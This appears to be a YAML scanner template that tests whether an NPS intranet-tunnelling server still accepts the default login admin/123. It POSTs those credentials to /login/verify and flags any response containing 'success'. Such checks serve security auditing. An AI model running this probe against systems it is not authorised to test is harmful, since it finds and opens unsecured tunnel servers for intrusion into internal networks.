name: poc-yaml-NPS内网穿透-defaultpasswd
description: "登录方式:admin/123"
method: POST
body: "username=admin&password=123"
headers:
  Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
  Accept: "*/*"
  X-Requested-With: "XMLHttpRequest"
  Agent:  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
  Encoding: "gzip, deflate"
  Accept-Language:  "zh-CN,zh;q=0.9"
  Connection: "close"
path:
  - /login/verify
expression:
  status: 200
  body_any:
    - "success"